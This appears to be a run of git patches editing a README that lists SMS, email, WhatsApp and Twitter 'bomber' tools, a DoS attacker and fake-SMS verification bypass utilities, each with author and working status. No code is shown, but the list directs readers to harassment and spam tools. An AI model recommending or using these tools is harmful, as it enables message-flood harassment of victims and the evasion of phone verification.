13:43:48 +0530 Subject: [PATCH 52/58] ,mnbv --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index cadb968..e5813aa 100644 --- a/README.md +++ b/README.md @@ -43,6 +43,7 @@ |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|12.| Email_bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[ffffffffrfrfrffrrfdrfrefdere](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From 71a8aa3763d02fda4dbf63dd71f9648643e11113 Mon Sep 17 00:00:00 2001 From: github348 Date: Fri, 4 Feb 2022 13:45:17 +0530 Subject: [PATCH 53/58] jhg --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e5813aa..f33a61d 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|12.| Email_bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[ffffffffrfrfrffrrfdrfrefdere](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|12.| email-bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[ffffffffrfrfrffrrfdrfrefdere](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From cd50233b937a006b84ad1d4d76612624333d6e6a Mon Sep 17 00:00:00 2001 From: Sameer Bhatt <22076778+bhattsameer@users.noreply.github.com> Date: Sun, 13 Feb 2022 11:37:37 +0530 Subject: [PATCH 54/58] Update README.md --- README.md | 33 +++++++++++++++++---------------- 1 file changed, 17 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index f33a61d..01c2b44 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|12.| email-bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[ffffffffrfrfrffrrfdrfrefdere](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|12.| email-bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[bagarrattaa](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | @@ -58,6 +58,13 @@ |--------|------|--------------|-------------|--------| |1.| Twitter_bomber.py |Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open. | [akshaykalucha3](https://github.com/akshaykalucha3)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | + +### TEMP & Fake-SMS Collection: +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| tmpsms| A temporary SMS utility right from your terminal written in POSIX sh. |[sdushantha](https://github.com/sdushantha)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|2.| fake-sms| A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. |[Narasimha1997](https://github.com/Narasimha1997)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | + ### Others: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| @@ -66,25 +73,19 @@ |3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| |4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| -### TEMP & Fake-SMS Collection: -| Sr.No. | Name | Description | Developed By | Status | -|--------|------|--------------|-------------|--------| -|1.| tmpsms| A temporary SMS utility right from your terminal written in POSIX sh. |[sdushantha](https://github.com/sdushantha)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|2.| fake-sms| A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. |[Narasimha1997](https://github.com/Narasimha1997)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | - ## Contributors: To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. -||| -|--------------|----------| -|:octocat: [iMro0t](https://github.com/iMro0t)|:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)| -|:octocat: [rizwansoaib](https://github.com/rizwansoaib)|:octocat: [xyzricky](https://github.com/xyzricky)| -|:octocat: [scienceLabwork](https://github.com/scienceLabwork)|:octocat: [timofey260](https://github.com/timofey260)| -|:octocat: [cclauss](https://github.com/cclauss)|:octocat: [juzeon](https://github.com/juzeon)| -|:octocat: [rduttshukla](https://github.com/rduttshukla)|:octocat: [Ghost](https://github.com/ghost)| -|:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| -|:octocat: [zeyad-mansour](https://github.com/zeyad-mansour)|:octocat: [ebankoff](https://github.com/ebankoff)| +|||| +|--------------|----------|----------| +|:octocat: [iMro0t](https://github.com/iMro0t)|:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)|:octocat: [bagarrattaa](https://github.com/bagarrattaa)| +|:octocat: [rizwansoaib](https://github.com/rizwansoaib)|:octocat: [xyzricky](https://github.com/xyzricky)| | +|:octocat: [scienceLabwork](https://github.com/scienceLabwork)|:octocat: [timofey260](https://github.com/timofey260)| | +|:octocat: [cclauss](https://github.com/cclauss)|:octocat: [juzeon](https://github.com/juzeon)| | +|:octocat: [rduttshukla](https://github.com/rduttshukla)|:octocat: [Ghost](https://github.com/ghost)| | +|:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| | +|:octocat: [zeyad-mansour](https://github.com/zeyad-mansour)|:octocat: [ebankoff](https://github.com/ebankoff)| | ## Note: From 83c953a80b86cd3c9094d04dbd1a5969aea50eec Mon Sep 17 00:00:00 2001 From: ebankoff <80776324+ebankoff@users.noreply.github.com> Date: Tue, 3 May 2022 21:00:32 +0300 Subject: [PATCH 55/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 01c2b44..f62a870 100644 --- a/README.md +++ b/README.md @@ -27,7 +27,7 @@ |14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|17.| BoMbEr|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|17.| Beast_Bomber|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### EMAIL BOMBERS :e-mail: :boom: | Sr.No. | Name | Description | Developed By | Status | From ece8012739248cd830d0ae449188be63a45ffc8e Mon Sep 17 00:00:00 2001 From: bagarrattaa Date: Wed, 25 May 2022 16:51:37 +0530 Subject: [PATCH 56/58] update readme --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 01c2b44..49c91be 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|12.| email-bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[bagarrattaa](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|12.| email-nuker |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[bagarrattaa](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From 8b0c5bfc60842d841c0c94d0558be12ad77764b8 Mon Sep 17 00:00:00 2001 From: bagarrattaa Date: Wed, 25 May 2022 16:55:52 +0530 Subject: [PATCH 57/58] remove xlr8_bomber --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 49c91be..99c2ad1 100644 --- a/README.md +++ b/README.md @@ -26,8 +26,7 @@ |13.| ni_bomber |SMS Bomber |Nikait|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|17.| BoMbEr|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|16.| BoMbEr|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### EMAIL BOMBERS :e-mail: :boom: | Sr.No. | Name | Description | Developed By | Status | From 8ddccb88dc38aefe8724426e0c0b6a34888ec9f3 Mon Sep 17 00:00:00 2001 From: ebankoff <80776324+ebankoff@users.noreply.github.com> Date: Sat, 16 Jul 2022 01:30:30 +0300 Subject: [PATCH 58/58] Minor corrections --- README.md | 87 ++++++++++++++++++++++++++++--------------------------- 1 file changed, 45 insertions(+), 42 deletions(-) diff --git a/README.md b/README.md index 99c2ad1..9524504 100644 --- a/README.md +++ b/README.md @@ -3,74 +3,77 @@ | Status | Description | Color Code | |--------|-------------|------------| -|Working| The Script is working. | ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|Not- Working| Scripts are not working Or need some modifications.|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | -|Others| Pending, Some anothers issues OR not checked that is it working or not.| ![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| +|Working| The Script is working. | ![Working](https://i.ibb.co/3FntR1c/1.png) | +|Not- Working| Scripts are not working Or need some modifications.|![Not-Working](https://i.ibb.co/wWtD8S6/2.png) | +|Others| Pending, Some anothers issues OR not checked that is it working or not.| ![Others](https://i.ibb.co/pQwqwcN/3.png)| ### SMS BOMBERS :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| Sms_bomber.py | Sending continues sms from using one single link. NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py | bhattsameer| ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|2.| Sms_bomber_version2.py | Sending continues sms from using one Multiple links.| bhattsameer| ![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| -|3.| bomb3r 💣 |Sending continues sms from on specified mobile number (25 different sms providers) |iMro0t | ![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|4.| numspy_bomber.py | Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) |bhattsameer|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|5.| SmS-BomB| Your Own SmS BomBer...!!! |[Bhai4You](https://github.com/Bhai4You) |![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|6.| SpamSms |Spamming mobile number with OTP.|KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| -|7.| C-SpamMasal |Spamming mobile number with OTP. |KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|8.| SMS-BOMBER |SMS Bomber.|jdleo|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|9.| TBomb |A free and open-source SMS/Call bombing application | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|11.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|12.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|13.| ni_bomber |SMS Bomber |Nikait|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | -|14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | -|15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|16.| BoMbEr|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|1.| Sms_bomber.py | Sending continues sms from using one single link. NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py | bhattsameer| ![Working](https://i.ibb.co/3FntR1c/1.png) | +|2.| Sms_bomber_version2.py | Sending continues sms from using one Multiple links.| bhattsameer| ![Others](https://i.ibb.co/pQwqwcN/3.png)| +|3.| bomb3r 💣 |Sending continues sms from on specified mobile number (25 different sms providers) |iMro0t | ![Working](https://i.ibb.co/3FntR1c/1.png) | +|4.| numspy_bomber.py | Numspy bomber sending multiple free messages using numspy module. (Currently not working need to update) |bhattsameer|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|5.| SmS-BomB| Your Own SmS BomBer...!!! |[Bhai4You](https://github.com/Bhai4You) |![Others](https://i.ibb.co/pQwqwcN/3.png) | +|6.| SpamSms |Spamming mobile number with OTP.|KANG-NEWBIE|![Others](https://i.ibb.co/pQwqwcN/3.png)| +|7.| C-SpamMasal |Spamming mobile number with OTP. |KANG-NEWBIE|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|8.| SMS-BOMBER |SMS Bomber.|jdleo|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|9.| TBomb |A free and open-source SMS/Call bombing application | TheSpeedX|![Working](https://i.ibb.co/3FntR1c/1.png) | +|10.| smsBomb |SMS Bomber.| shellvon|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|11.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|12.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|13.| ni_bomber |SMS Bomber |Nikait|![Not-Working](https://i.ibb.co/wWtD8S6/2.png) | +|14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://i.ibb.co/wWtD8S6/2.png) | +|15.| smsbomb|Sms Bomber.|1d8|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://i.ibb.co/3FntR1c/1.png) | +|17.| Beast_Bomber|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://i.ibb.co/3FntR1c/1.png) | ### EMAIL BOMBERS :e-mail: :boom: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| Email_bomber.py |Sending continues email. Update with Outlook bomber as well |[xyzricky](https://github.com/xyzricky)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|2.| Email_bomber |Sending continues email. |[zanyarjamal](https://github.com/zanyarjamal) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|3.| Email_bomb |Sending continues email using your yahoo and gmail account.|[MrMugiwara](https://github.com/MrMugiwara)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|4.| EmBomber| Email Bomber. |MazenElzanaty|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| -|5.| Python---Email-Bomber | Email Bomber.| ncorbuk|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|6.| EmailPySpam |Email Bomber.|Curioo|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|12.| email-nuker |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[bagarrattaa](https://github.com/bagarrattaa) |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|1.| Email_bomber.py |Sending continues email. Update with Outlook bomber as well |[xyzricky](https://github.com/xyzricky)|![Working](https://i.ibb.co/3FntR1c/1.png) | +|2.| Email_bomber |Sending continues email. |[zanyarjamal](https://github.com/zanyarjamal) |![Working](https://i.ibb.co/3FntR1c/1.png) | +|3.| Email_bomb |Sending continues email using your yahoo and gmail account.|[MrMugiwara](https://github.com/MrMugiwara)|![Working](https://i.ibb.co/3FntR1c/1.png) | +|4.| EmBomber| Email Bomber. |MazenElzanaty|![Others](https://i.ibb.co/pQwqwcN/3.png)| +|5.| Python---Email-Bomber | Email Bomber.| ncorbuk|![Working](https://i.ibb.co/3FntR1c/1.png) | +|6.| EmailPySpam |Email Bomber.|Curioo|![Working](https://i.ibb.co/3FntR1c/1.png) | +|7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://i.ibb.co/3FntR1c/1.png) | +|8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://i.ibb.co/3FntR1c/1.png) | +|9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://i.ibb.co/3FntR1c/1.png) | +|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://i.ibb.co/3FntR1c/1.png) | +|11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://i.ibb.co/3FntR1c/1.png) | +|12.| email-bomber |this is a email bomber unlike other email bombers u don't need your gmail email id to use this. |[bagarrattaa](https://github.com/bagarrattaa) |![Working](https://i.ibb.co/3FntR1c/1.png) | +|13.| Beast_Bomber|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://i.ibb.co/3FntR1c/1.png) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| wbomb.py| Whatsapp-bomber sending multipal message to a single user.|bhattsameer Last Modified: [getPoland](https://github.com/getPoland)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| -|2.| whatabomb | Whats-app bomber GUI. | [tbhaxor](https://github.com/tbhaxor)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|3.| WhatsApp-Bomber | WhatsApp Monitor+Bomber (Chrome Extension)| [rizwansoaib](https://github.com/rizwansoaib)|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+)| -|4.| WhatsApp-Spam | WhatsApp-Spam scripts | [macr1408](https://github.com/macr1408)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|1.| wbomb.py| Whatsapp-bomber sending multipal message to a single user.|bhattsameer Last Modified: [getPoland](https://github.com/getPoland)|![Working](https://i.ibb.co/3FntR1c/1.png)| +|2.| whatabomb | Whats-app bomber GUI. | [tbhaxor](https://github.com/tbhaxor)|![Working](https://i.ibb.co/3FntR1c/1.png) | +|3.| WhatsApp-Bomber | WhatsApp Monitor+Bomber (Chrome Extension)| [rizwansoaib](https://github.com/rizwansoaib)|![Not-Working](https://i.ibb.co/wWtD8S6/2.png)| +|4.| WhatsApp-Spam | WhatsApp-Spam scripts | [macr1408](https://github.com/macr1408)|![Others](https://i.ibb.co/pQwqwcN/3.png) | +|5.| Beast_Bomber|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://i.ibb.co/3FntR1c/1.png) | ### Twitter Bombers :boom: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| Twitter_bomber.py |Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open. | [akshaykalucha3](https://github.com/akshaykalucha3)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|1.| Twitter_bomber.py |Twitter-bomber this will allow spamming the twitter inbox of a person with the message you want, the person who is using this must make sure that the inbox of the user who will be spammed is open. | [akshaykalucha3](https://github.com/akshaykalucha3)|![Working](https://i.ibb.co/3FntR1c/1.png) | ### TEMP & Fake-SMS Collection: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| tmpsms| A temporary SMS utility right from your terminal written in POSIX sh. |[sdushantha](https://github.com/sdushantha)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|2.| fake-sms| A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. |[Narasimha1997](https://github.com/Narasimha1997)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|1.| tmpsms| A temporary SMS utility right from your terminal written in POSIX sh. |[sdushantha](https://github.com/sdushantha)|![Working](https://i.ibb.co/3FntR1c/1.png) | +|2.| fake-sms| A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. |[Narasimha1997](https://github.com/Narasimha1997)|![Working](https://i.ibb.co/3FntR1c/1.png) | ### Others: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | -|2.| HPomb|HPomb Call, SMS and mail bomber all in one. |[HoneyPots0](https://github.com/HoneyPots0)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| -|3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| -|4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +|1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Not-Working](https://i.ibb.co/wWtD8S6/2.png) | +|2.| HPomb|HPomb Call, SMS and mail bomber all in one. |[HoneyPots0](https://github.com/HoneyPots0)|![Others](https://i.ibb.co/pQwqwcN/3.png)| +|3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://i.ibb.co/3FntR1c/1.png)| +|4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://i.ibb.co/3FntR1c/1.png)| ## Contributors: